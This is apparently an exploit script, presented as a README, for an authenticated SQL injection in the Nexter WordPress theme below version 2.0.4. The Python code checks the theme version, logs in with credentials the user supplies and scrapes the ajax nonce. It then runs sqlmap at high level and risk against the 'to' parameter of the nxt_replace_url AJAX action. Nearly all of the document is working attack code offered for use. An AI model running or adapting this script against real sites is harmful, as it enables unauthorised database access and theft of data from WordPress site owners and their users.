README.md
Rendering markdown...
import os
import click
import argparse
import requests
import subprocess
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
session = requests.Session()
http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy
def version_check(wordpress_url):
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}
plugin_url = ""+wordpress_url+"/wp-content/themes/nexter/style.css"
response = requests.get(plugin_url, headers=headers,verify=False,timeout=30)
if response.status_code == 200:
content = response.text
version_line = next((line for line in content.split('\n') if line.startswith('Stable tag:')), None)
if version_line:
version = version_line.split(':')[1].strip()
if version >= '2.0.4':
print("The theme version is 2.0.4 or above.")
exit()
else:
print("The theme version is below 2.0.4.")
return True
else:
print("Failed to find the version information in the style.css file.")
exit()
else:
print("Plugin not installed")
exit()
def hack_em(username,password,wordpress_url,nonce,cookies):
cookie_string = "; ".join([f"{name}={value}" for name, value in cookies.items()])
command = 'sqlmap -u "'+wordpress_url+'/wp-admin/admin-ajax.php" --data="action=nxt_replace_url&nexter_nonce='+nonce+'&from=test&to=test2&case=no" --referer="'+wordpress_url+'/wp-admin/admin.php?page=nexter_extra_options" --level 5 --risk 3 --threads 4 -p to --dbms=mysql --random-agent --cookie "'+cookie_string+'"'
try:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)
for line in iter(process.stdout.readline, ''):
print(line.strip())
process.communicate() # Wait for the command to complete
if process.returncode != 0:
print(f"Command execution failed with error code {process.returncode}.")
except subprocess.CalledProcessError as e:
print(f"Command execution failed with error code {e.returncode}.")
print(e.output)
def sendem(username,password,wordpress_url):
# Set up the session
session = requests.Session()
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
# Define the login URL and credentials
login_url = wordpress_url + '/wp-login.php'
# Send a GET request to retrieve the login page and obtain necessary cookies
response = session.get(login_url, headers={"User-Agent": user_agent})
# Extract the required cookies from the response headers
cookies = response.cookies
# Prepare the login data
login_data = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'redirect_to': wordpress_url + '/wp-admin/',
'testcookie': '1'
}
# Send a POST request to log in
login_response = session.post(login_url, data=login_data, cookies=cookies, headers={"User-Agent": user_agent})
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
regex_pattern = r'"ajax_nonce":"(.*?)"'
match = re.search(regex_pattern, login_response.text)
if match:
nonce = match.group(1)
print("Nonce:", nonce)
hack_em(username,password,wordpress_url,nonce,session.cookies)
else:
print("Nonce not found.")
exit()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-w", "--url", required=True, help="URL of the WordPress site")
parser.add_argument("-u", "--username", required=True, help="Username of your wordpress user")
parser.add_argument("-p", "--password", required=True, help="Password of your wordpress password")
args = parser.parse_args()
wordpress_url = args.url
version_check(wordpress_url)
username = args.username
password = args.password
sendem(username,password,wordpress_url)